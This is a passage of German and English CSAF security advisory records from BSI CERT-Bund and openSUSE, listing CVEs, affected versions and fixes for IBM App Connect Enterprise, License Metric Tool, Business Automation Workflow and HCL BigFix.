"summary": "Neue Updates von IBM aufgenommen"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "IBM App Connect Enterprise",
"product": {
"name": "IBM App Connect Enterprise",
"product_id": "T032495",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:-"
}
}
},
{
"category": "product_version_range",
"name": "Certified Container Operator \u003c12.11.0",
"product": {
"name": "IBM App Connect Enterprise Certified Container Operator \u003c12.11.0",
"product_id": "T043543"
}
},
{
"category": "product_version",
"name": "Certified Container Operator 12.11.0",
"product": {
"name": "IBM App Connect Enterprise Certified Container Operator 12.11.0",
"product_id": "T043543-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:certified_container_operator__12.11.0"
}
}
},
{
"category": "product_version_range",
"name": "Certified Container Operator LTS \u003c12.0.11",
"product": {
"name": "IBM App Connect Enterprise Certified Container Operator LTS \u003c12.0.11",
"product_id": "T043544"
}
},
{
"category": "product_version",
"name": "Certified Container Operator LTS 12.0.11",
"product": {
"name": "IBM App Connect Enterprise Certified Container Operator LTS 12.0.11",
"product_id": "T043544-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:certified_container_operator_lts__12.0.11"
}
}
}
],
"category": "product_name",
"name": "App Connect Enterprise"
},
{
"category": "product_name",
"name": "IBM Business Automation Workflow",
"product": {
"name": "IBM Business Automation Workflow",
"product_id": "T043411",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:-"
}
}
}
],
"category": "vendor",
"name": "IBM"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-6827",
"product_status": {
"known_affected": [
"T043411",
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2024-6827"
},
{
"cve": "CVE-2025-1194",
"product_status": {
"known_affected": [
"T043411",
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2025-1194"
},
{
"cve": "CVE-2025-32996",
"product_status": {
"known_affected": [
"T043411",
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2025-32996"
},
{
"cve": "CVE-2025-32997",
"product_status": {
"known_affected": [
"T043411",
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2025-32997"
},
{
"cve": "CVE-2025-27152",
"product_status": {
"known_affected": [
"T043411",
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-27789",
"product_status": {
"known_affected": [
"T043411",
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2025-27789"
},
{
"cve": "CVE-2025-1993",
"product_status": {
"known_affected": [
"T043411",
"T043543",
"T043544",
"T032495"
]
},
"release_date": "2025-05-11T22:00:00.000+00:00",
"title": "CVE-2025-1993"
}
]
}
wid-sec-w-2025-0841
Vulnerability from csaf_certbund
Published
2025-04-16 22:00
Modified
2025-05-08 22:00
Summary
IBM App Connect Enterprise: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM App Connect Enterprise kombiniert die branchenbewährten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.
Angriff
Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in IBM App Connect Enterprise ausnutzen, um Sicherheitsvorkehrungen zu umgehen, Informationen auszuspähen oder seine Privilegien zu eskalieren
Betroffene Betriebssysteme
- Linux
- Sonstiges
- UNIX
- Windows
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM App Connect Enterprise kombiniert die branchenbew\u00e4hrten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in IBM App Connect Enterprise ausnutzen, um Sicherheitsvorkehrungen zu umgehen, Informationen auszusp\u00e4hen oder seine Privilegien zu eskalieren",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-0841 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-0841.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-0841 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0841"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-04-16",
"url": "https://www.ibm.com/support/pages/node/7231056"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7232928 vom 2025-05-08",
"url": "https://www.ibm.com/support/pages/node/7232928"
}
],
"source_lang": "en-US",
"title": "IBM App Connect Enterprise: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-05-08T22:00:00.000+00:00",
"generator": {
"date": "2025-05-09T07:44:26.369+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.12"
}
},
"id": "WID-SEC-W-2025-0841",
"initial_release_date": "2025-04-16T22:00:00.000+00:00",
"revision_history": [
{
"date": "2025-04-16T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-05-08T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von IBM aufgenommen"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c13.0.3.0",
"product": {
"name": "IBM App Connect Enterprise \u003c13.0.3.0",
"product_id": "T042961"
}
},
{
"category": "product_version",
"name": "13.0.3.0",
"product": {
"name": "IBM App Connect Enterprise 13.0.3.0",
"product_id": "T042961-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:13.0.3.0"
}
}
},
{
"category": "product_version_range",
"name": "\u003c12.0.12.13",
"product": {
"name": "IBM App Connect Enterprise \u003c12.0.12.13",
"product_id": "T042962"
}
},
{
"category": "product_version",
"name": "12.0.12.13",
"product": {
"name": "IBM App Connect Enterprise 12.0.12.13",
"product_id": "T042962-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:12.0.12.13"
}
}
},
{
"category": "product_version_range",
"name": "\u003c12.11.0",
"product": {
"name": "IBM App Connect Enterprise \u003c12.11.0",
"product_id": "T043525"
}
},
{
"category": "product_version",
"name": "12.11.0",
"product": {
"name": "IBM App Connect Enterprise 12.11.0",
"product_id": "T043525-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:12.11.0"
}
}
}
],
"category": "product_name",
"name": "App Connect Enterprise"
}
],
"category": "vendor",
"name": "IBM"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-57965",
"product_status": {
"known_affected": [
"T042961",
"T042962",
"T043525"
]
},
"release_date": "2025-04-16T22:00:00.000+00:00",
"title": "CVE-2024-57965"
},
{
"cve": "CVE-2025-27152",
"product_status": {
"known_affected": [
"T042961",
"T042962",
"T043525"
]
},
"release_date": "2025-04-16T22:00:00.000+00:00",
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-29774",
"product_status": {
"known_affected": [
"T042961",
"T042962",
"T043525"
]
},
"release_date": "2025-04-16T22:00:00.000+00:00",
"title": "CVE-2025-29774"
},
{
"cve": "CVE-2025-29775",
"product_status": {
"known_affected": [
"T042961",
"T042962",
"T043525"
]
},
"release_date": "2025-04-16T22:00:00.000+00:00",
"title": "CVE-2025-29775"
}
]
}
wid-sec-w-2025-0580
Vulnerability from csaf_certbund
Published
2025-03-17 23:00
Modified
2025-05-04 22:00
Summary
IBM License Metric Tool: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Das IBM License Metric Tool dient der Lizenzverwaltung für IBM Produkte.
Angriff
Ein entfernter anonymer oder lokaler Angreifer kann mehrere Schwachstellen im IBM License Metric Tool ausnutzen, um Daten (Protokolldateien) zu manipulieren, einen Denial-of-Service-Zustand herbeizuführen, vertrauliche Informationen offenzulegen, Sicherheitsmaßnahmen zu umgehen oder SSRF-Angriffe durchzuführen.
Betroffene Betriebssysteme
- Sonstiges
- UNIX
- Windows
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Das IBM License Metric Tool dient der Lizenzverwaltung f\u00fcr IBM Produkte.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter anonymer oder lokaler Angreifer kann mehrere Schwachstellen im IBM License Metric Tool ausnutzen, um Daten (Protokolldateien) zu manipulieren, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Sicherheitsma\u00dfnahmen zu umgehen oder SSRF-Angriffe durchzuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-0580 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-0580.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-0580 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0580"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-03-17",
"url": "https://www.ibm.com/support/pages/node/7186586"
},
{
"category": "external",
"summary": "POC f\u00fcr CVE-2025-25184",
"url": "https://advisories.gitlab.com/pkg/gem/rack/CVE-2025-25184/"
},
{
"category": "external",
"summary": "POC f\u00fcr CVE-2024-52798",
"url": "https://github.com/advisories/GHSA-rhx6-c78j-4q9w"
},
{
"category": "external",
"summary": "HCL Article KB0120960 vom 2025-05-02",
"url": "https://support.hcl-software.com/csm?id=kb_article\u0026sysparm_article=KB0120960"
}
],
"source_lang": "en-US",
"title": "IBM License Metric Tool: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-05-04T22:00:00.000+00:00",
"generator": {
"date": "2025-05-05T08:08:53.411+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.12"
}
},
"id": "WID-SEC-W-2025-0580",
"initial_release_date": "2025-03-17T23:00:00.000+00:00",
"revision_history": [
{
"date": "2025-03-17T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-05-04T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von HCL aufgenommen"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "Compliance",
"product": {
"name": "HCL BigFix Compliance",
"product_id": "T038823",
"product_identification_helper": {
"cpe": "cpe:/a:hcltech:bigfix:compliance"
}
}
}
],
"category": "product_name",
"name": "BigFix"
}
],
"category": "vendor",
"name": "HCL"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c9.2.39",
"product": {
"name": "IBM License Metric Tool \u003c9.2.39",
"product_id": "T041960"
}
},
{
"category": "product_version",
"name": "9.2.39",
"product": {
"name": "IBM License Metric Tool 9.2.39",
"product_id": "T041960-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:license_metric_tool:9.2.39"
}
}
}
],
"category": "product_name",
"name": "License Metric Tool"
}
],
"category": "vendor",
"name": "IBM"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-10917",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-10917"
},
{
"cve": "CVE-2024-12797",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-12797"
},
{
"cve": "CVE-2024-21208",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-21208"
},
{
"cve": "CVE-2024-21210",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-21210"
},
{
"cve": "CVE-2024-21217",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-21217"
},
{
"cve": "CVE-2024-21235",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-21235"
},
{
"cve": "CVE-2024-45296",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-45296"
},
{
"cve": "CVE-2024-52798",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-52798"
},
{
"cve": "CVE-2024-57965",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2024-57965"
},
{
"cve": "CVE-2025-27111",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2025-27111"
},
{
"cve": "CVE-2025-27152",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-25184",
"product_status": {
"known_affected": [
"T038823",
"T041960"
]
},
"release_date": "2025-03-17T23:00:00.000+00:00",
"title": "CVE-2025-25184"
}
]
}
wid-sec-w-2025-0930
Vulnerability from csaf_certbund
Published
2025-05-04 22:00
Modified
2025-05-04 22:00
Summary
IBM Business Automation Workflow: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM Business Automation Workflow ist eine Lösung zur Automatisierung von Arbeitsabläufen.
Angriff
Ein Angreifer kann mehrere Schwachstellen in IBM Business Automation Workflow ausnutzen, um einen Denial of Service Angriff durchzuführen, oder Informationen auszuspähen.
Betroffene Betriebssysteme
- Linux
- UNIX
- Windows
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM Business Automation Workflow ist eine L\u00f6sung zur Automatisierung von Arbeitsabl\u00e4ufen.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in IBM Business Automation Workflow ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren, oder Informationen auszusp\u00e4hen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-0930 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-0930.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-0930 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0930"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-05-04",
"url": "https://www.ibm.com/support/pages/node/7232428"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-05-04",
"url": "https://www.ibm.com/support/pages/node/7232433"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-05-04",
"url": "https://www.ibm.com/support/pages/node/7232434"
}
],
"source_lang": "en-US",
"title": "IBM Business Automation Workflow: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-05-04T22:00:00.000+00:00",
"generator": {
"date": "2025-05-05T09:33:43.997+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.12"
}
},
"id": "WID-SEC-W-2025-0930",
"initial_release_date": "2025-05-04T22:00:00.000+00:00",
"revision_history": [
{
"date": "2025-05-04T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c24.0.1-IF002",
"product": {
"name": "IBM Business Automation Workflow \u003c24.0.1-IF002",
"product_id": "T043295"
}
},
{
"category": "product_version",
"name": "24.0.1-IF002",
"product": {
"name": "IBM Business Automation Workflow 24.0.1-IF002",
"product_id": "T043295-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:24.0.1-if002"
}
}
},
{
"category": "product_version_range",
"name": "\u003c24.0.0-IF005",
"product": {
"name": "IBM Business Automation Workflow \u003c24.0.0-IF005",
"product_id": "T043296"
}
},
{
"category": "product_version",
"name": "24.0.0-IF005",
"product": {
"name": "IBM Business Automation Workflow 24.0.0-IF005",
"product_id": "T043296-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:24.0.0-if005"
}
}
},
{
"category": "product_version_range",
"name": "\u003cDT433330",
"product": {
"name": "IBM Business Automation Workflow \u003cDT433330",
"product_id": "T043297"
}
},
{
"category": "product_version",
"name": "DT433330",
"product": {
"name": "IBM Business Automation Workflow DT433330",
"product_id": "T043297-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:dt433330"
}
}
},
{
"category": "product_version_range",
"name": "\u003cDT423873",
"product": {
"name": "IBM Business Automation Workflow \u003cDT423873",
"product_id": "T043298"
}
},
{
"category": "product_version",
"name": "DT423873",
"product": {
"name": "IBM Business Automation Workflow DT423873",
"product_id": "T043298-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:dt423873"
}
}
},
{
"category": "product_version_range",
"name": "\u003c24.0.1-IF001",
"product": {
"name": "IBM Business Automation Workflow \u003c24.0.1-IF001",
"product_id": "T043304"
}
},
{
"category": "product_version",
"name": "24.0.1-IF001",
"product": {
"name": "IBM Business Automation Workflow 24.0.1-IF001",
"product_id": "T043304-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:24.0.1-if001"
}
}
},
{
"category": "product_version_range",
"name": "\u003cDT426591",
"product": {
"name": "IBM Business Automation Workflow \u003cDT426591",
"product_id": "T043306"
}
},
{
"category": "product_version",
"name": "DT426591",
"product": {
"name": "IBM Business Automation Workflow DT426591",
"product_id": "T043306-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:dt426591"
}
}
},
{
"category": "product_version_range",
"name": "\u003cDT424716",
"product": {
"name": "IBM Business Automation Workflow \u003cDT424716",
"product_id": "T043307"
}
},
{
"category": "product_version",
"name": "DT424716",
"product": {
"name": "IBM Business Automation Workflow DT424716",
"product_id": "T043307-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:dt424716"
}
}
}
],
"category": "product_name",
"name": "Business Automation Workflow"
}
],
"category": "vendor",
"name": "IBM"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-55565",
"product_status": {
"known_affected": [
"T043306",
"T043307",
"T043295",
"T043296",
"T043297"
]
},
"release_date": "2025-05-04T22:00:00.000+00:00",
"title": "CVE-2024-55565"
},
{
"cve": "CVE-2025-1495",
"product_status": {
"known_affected": [
"T043306",
"T043307",
"T043295",
"T043298"
]
},
"release_date": "2025-05-04T22:00:00.000+00:00",
"title": "CVE-2025-1495"
},
{
"cve": "CVE-2025-1838",
"product_status": {
"known_affected": [
"T043304",
"T043306",
"T043307",
"T043295",
"T043296"
]
},
"release_date": "2025-05-04T22:00:00.000+00:00",
"title": "CVE-2025-1838"
},
{
"cve": "CVE-2025-27152",
"product_status": {
"known_affected": [
"T043306",
"T043307",
"T043295",
"T043296",
"T043297",
"T043298"
]
},
"release_date": "2025-05-04T22:00:00.000+00:00",
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-27789",
"product_status": {
"known_affected": [
"T043306",
"T043307",
"T043295",
"T043296",
"T043297",
"T043298"
]
},
"release_date": "2025-05-04T22:00:00.000+00:00",
"title": "CVE-2025-27789"
}
]
}
wid-sec-w-2025-0705
Vulnerability from csaf_certbund
Published
2025-04-03 22:00
Modified
2025-04-15 22:00
Summary
HCL BigFix WebUI-Anwendungen: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
BigFix ist eine Lösung zum Erkennen und Verwalten von physischen und virtuellen Endpunkten.
Angriff
Ein entfernter anonymer oder lokaler Angreifer kann mehrere Schwachstellen in HCL BigFix ausnutzen, um Dateien zu manipulieren, erhöhte Privilegien zu erlangen, einen Denial-of-Service-Zustand auszulösen, vertrauliche Informationen offenzulegen und beliebigen Code auszuführen.
Betroffene Betriebssysteme
- Sonstiges
- UNIX
- Windows
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "BigFix ist eine L\u00f6sung zum Erkennen und Verwalten von physischen und virtuellen Endpunkten.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter anonymer oder lokaler Angreifer kann mehrere Schwachstellen in HCL BigFix ausnutzen, um Dateien zu manipulieren, erh\u00f6hte Privilegien zu erlangen, einen Denial-of-Service-Zustand auszul\u00f6sen, vertrauliche Informationen offenzulegen und beliebigen Code auszuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-0705 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-0705.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-0705 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0705"
},
{
"category": "external",
"summary": "HCL Security Bulletin vom 2025-04-03",
"url": "https://support.hcl-software.com/csm?id=kb_article\u0026sysparm_article=KB0120318"
},
{
"category": "external",
"summary": "PoC f\u00fcr CVE-2025-27152 2025-04-03",
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
},
{
"category": "external",
"summary": "PoC f\u00fcr CVE-2025-25977 2025-04-03",
"url": "https://github.com/canvg/canvg/issues/1749"
},
{
"category": "external",
"summary": "PoC f\u00fcr CVE-2025-27789 2025-04-03",
"url": "https://github.com/babel/babel/pull/17173"
},
{
"category": "external",
"summary": "HCL Security Bulletin vom 2025-04-15",
"url": "https://support.hcl-software.com/csm?id=kb_article\u0026sysparm_article=KB0120590"
}
],
"source_lang": "en-US",
"title": "HCL BigFix WebUI-Anwendungen: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-04-15T22:00:00.000+00:00",
"generator": {
"date": "2025-04-16T09:16:43.315+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.12"
}
},
"id": "WID-SEC-W-2025-0705",
"initial_release_date": "2025-04-03T22:00:00.000+00:00",
"revision_history": [
{
"date": "2025-04-03T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-04-15T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von HCL aufgenommen"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "WebUI Applications",
"product": {
"name": "HCL BigFix WebUI Applications",
"product_id": "T042383",
"product_identification_helper": {
"cpe": "cpe:/a:hcltech:bigfix:webui_applications"
}
}
},
{
"category": "product_version",
"name": "Reports",
"product": {
"name": "HCL BigFix Reports",
"product_id": "T042923",
"product_identification_helper": {
"cpe": "cpe:/a:hcltech:bigfix:reports"
}
}
}
],
"category": "product_name",
"name": "BigFix"
}
],
"category": "vendor",
"name": "HCL"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-47764",
"product_status": {
"known_affected": [
"T042923",
"T042383"
]
},
"release_date": "2025-04-03T22:00:00.000+00:00",
"title": "CVE-2024-47764"
},
{
"cve": "CVE-2025-25977",
"product_status": {
"known_affected": [
"T042923",
"T042383"
]
},
"release_date": "2025-04-03T22:00:00.000+00:00",
"title": "CVE-2025-25977"
},
{
"cve": "CVE-2025-27152",
"product_status": {
"known_affected": [
"T042923",
"T042383"
]
},
"release_date": "2025-04-03T22:00:00.000+00:00",
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-27789",
"product_status": {
"known_affected": [
"T042923",
"T042383"
]
},
"release_date": "2025-04-03T22:00:00.000+00:00",
"title": "CVE-2025-27789"
},
{
"cve": "CVE-2025-29774",
"product_status": {
"known_affected": [
"T042923",
"T042383"
]
},
"release_date": "2025-04-03T22:00:00.000+00:00",
"title": "CVE-2025-29774"
},
{
"cve": "CVE-2025-29775",
"product_status": {
"known_affected": [
"T042923",
"T042383"
]
},
"release_date": "2025-04-03T22:00:00.000+00:00",
"title": "CVE-2025-29775"
}
]
}
opensuse-su-2025:15307-1
Vulnerability from csaf_opensuse
Published
2025-07-03 00:00
Modified
2025-07-03 00:00
Summary
velociraptor-0.7.0.4.git163.87ee3570-1.1 on GA media
Notes
Title of the patch
velociraptor-0.7.0.4.git163.87ee3570-1.1 on GA media
Description of the patch
These are all security issues fixed in the velociraptor-0.7.0.4.git163.87ee3570-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-15307
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
